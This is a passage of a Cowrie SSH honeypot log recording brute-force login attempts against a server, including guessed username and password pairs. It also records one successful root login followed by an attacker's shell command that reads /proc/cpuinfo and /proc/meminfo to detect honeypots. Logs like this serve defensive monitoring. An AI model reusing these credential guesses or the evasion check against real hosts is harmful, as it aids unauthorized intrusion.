0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:53:55.825884Z","src_ip":"212.227.125.160","session":"4232b9fdcbfb"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin01","message":"login attempt [admin/admin01] failed","sensor":"my-vps","timestamp":"2025-08-28T17:53:59.535148Z","src_ip":"212.227.125.160","session":"4232b9fdcbfb"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:54:00.863727Z","src_ip":"212.227.125.160","session":"4232b9fdcbfb"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":53896,"dst_ip":"1.2.3.4","dst_port":22,"session":"7976c157e76a","protocol":"ssh","message":"New connection: 199.195.253.95:53896 (1.2.3.4:22) [session: 7976c157e76a]","sensor":"my-vps","timestamp":"2025-08-28T17:54:20.248006Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T17:54:20.252390Z","src_ip":"199.195.253.95","session":"7976c157e76a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T17:54:20.429168Z","src_ip":"199.195.253.95","session":"7976c157e76a"}
{"eventid":"cowrie.login.failed","username":"peak","password":"peak123","message":"login attempt [peak/peak123] failed","sensor":"my-vps","timestamp":"2025-08-28T17:54:21.203572Z","src_ip":"199.195.253.95","session":"7976c157e76a"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:54:22.423800Z","src_ip":"199.195.253.95","session":"7976c157e76a"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63218,"dst_ip":"1.2.3.4","dst_port":22,"session":"3897eb732e22","protocol":"ssh","message":"New connection: 217.72.205.35:63218 (1.2.3.4:22) [session: 3897eb732e22]","sensor":"my-vps","timestamp":"2025-08-28T17:54:25.770196Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:54:25.771354Z","src_ip":"217.72.205.35","session":"3897eb732e22"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.185","src_port":45856,"dst_ip":"1.2.3.4","dst_port":22,"session":"58f071a47112","protocol":"ssh","message":"New connection: 171.243.150.185:45856 (1.2.3.4:22) [session: 58f071a47112]","sensor":"my-vps","timestamp":"2025-08-28T17:54:30.220605Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:54:30.225888Z","src_ip":"171.243.150.185","session":"58f071a47112"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:54:31.757075Z","src_ip":"171.243.150.185","session":"58f071a47112"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.185","src_port":34966,"dst_ip":"1.2.3.4","dst_port":22,"session":"be41b7fed486","protocol":"ssh","message":"New connection: 171.243.150.185:34966 (1.2.3.4:22) [session: be41b7fed486]","sensor":"my-vps","timestamp":"2025-08-28T17:54:33.239492Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:54:33.595441Z","src_ip":"171.243.150.185","session":"be41b7fed486"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:54:34.774440Z","src_ip":"171.243.150.185","session":"be41b7fed486"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T17:54:34.946936Z","src_ip":"171.243.150.185","session":"58f071a47112"}
{"eventid":"cowrie.session.closed","duration":"10.2","message":"Connection lost after 10.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:54:40.415023Z","src_ip":"171.243.150.185","session":"58f071a47112"}
{"eventid":"cowrie.session.connect","src_ip":"112.17.139.236","src_port":18977,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f4551629b31","protocol":"ssh","message":"New connection: 112.17.139.236:18977 (1.2.3.4:22) [session: 7f4551629b31]","sensor":"my-vps","timestamp":"2025-08-28T17:54:45.866779Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T17:54:45.867779Z","src_ip":"112.17.139.236","session":"7f4551629b31"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T17:54:46.085577Z","src_ip":"112.17.139.236","session":"7f4551629b31"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin01","message":"login attempt [admin/admin01] failed","sensor":"my-vps","timestamp":"2025-08-28T17:54:46.770185Z","src_ip":"171.243.150.185","session":"be41b7fed486"}
{"eventid":"cowrie.login.failed","username":"student","password":"P@ssw0rd","message":"login attempt [student/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-28T17:54:47.068623Z","src_ip":"112.17.139.236","session":"7f4551629b31"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:54:48.288587Z","src_ip":"112.17.139.236","session":"7f4551629b31"}
{"eventid":"cowrie.session.closed","duration":"15.6","message":"Connection lost after 15.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:54:48.797001Z","src_ip":"171.243.150.185","session":"be41b7fed486"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60216,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2546896c6d6","protocol":"ssh","message":"New connection: 212.227.125.160:60216 (1.2.3.4:22) [session: a2546896c6d6]","sensor":"my-vps","timestamp":"2025-08-28T17:54:52.195861Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:54:52.248436Z","src_ip":"212.227.125.160","session":"a2546896c6d6"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:54:52.481310Z","src_ip":"212.227.125.160","session":"a2546896c6d6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:54:53.417070Z","src_ip":"176.65.149.186","session":"1d901e7a2551"}
{"eventid":"cowrie.session.closed","duration":180.06585669517517,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:54:53.421685Z","src_ip":"176.65.149.186","session":"1d901e7a2551"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60718,"dst_ip":"1.2.3.4","dst_port":22,"session":"593de78b08c3","protocol":"ssh","message":"New connection: 212.227.125.160:60718 (1.2.3.4:22) [session: 593de78b08c3]","sensor":"my-vps","timestamp":"2025-08-28T17:54:59.798770Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:55:00.075138Z","src_ip":"212.227.125.160","session":"593de78b08c3"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T17:55:00.075863Z","src_ip":"212.227.125.160","session":"593de78b08c3"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@2","message":"login attempt [root/Admin@2] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:55:01.265493Z","src_ip":"212.227.125.160","session":"593de78b08c3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:55:01.635342Z","src_ip":"212.227.125.160","session":"593de78b08c3"}
{"eventid":"cowrie.command.input","input":"cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","message":"CMD: cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","sensor":"my-vps","timestamp":"2025-08-28T17:55:01.636342Z","src_ip":"212.227.125.160","session":"593de78b08c3"}
{"eventid":"cowrie.command.input","input":"grep model name /proc/cpuinfo 2 > /dev/null","message":"CMD: grep model name /proc/cpuinfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T17:55:01.637405Z","src_ip":"212.227.125.160","session":"593de78b08c3"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T17:55:01.640360Z","src_ip":"212.227.125.160","session":"593de78b08c3"}
{"eventid":"cowrie.command.input","input":"grep MemTotal /proc/meminfo 2 > /dev/null","message":"CMD: grep MemTotal /proc/meminfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T17:55:01.641410Z","src_ip":"212.227.125.160","session":"593de78b08c3"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T17:55:01.643281Z","src_ip":"212.227.125.160","session":"593de78b08c3"}
{"eventid":"cowrie.command.failed","input":"if [ -z ]","message":"Command not found: if [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T17:55:01.644966Z","src_ip":"212.227.125.160","session":"593de78b08c3"}
{"eventid":"cowrie.command.failed","input":"[ -z ]","message":"Command not found: [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T17:55:01.646638Z","src_ip":"212.227.125.160","session":"593de78b08c3"}
{"eventid":"cowrie.command.failed","input":"then","message":"Command not found: then","sensor":"my-vps","timestamp":"2025-08-28T17:55:01.648148Z","src_ip":"212.227.125.160","session":"593de78b08c3"}
{"eventid":"cowrie.command.failed","input":"else","message":"Command not found: else","sensor":"my-vps","timestamp":"2025-08-28T17:55:01.649561Z","src_ip":"212.227.125.160","session":"593de78b08c3"}
{"eventid":"cowrie.command.failed","input":"fi","message":"Command not found: fi","sensor":"my-vps","timestamp":"2025-08-28T17:55:01.650995Z","src_ip":"212.227.125.160","session":"593de78b08c3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","shasum":"070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","destfile":"/dev/null","message":"Saved redir contents with SHA-256 070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac to var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","sensor":"my-vps","timestamp":"2025-08-28T17:55:01.909786Z","src_ip":"212.227.125.160","session":"593de78b08c3"}
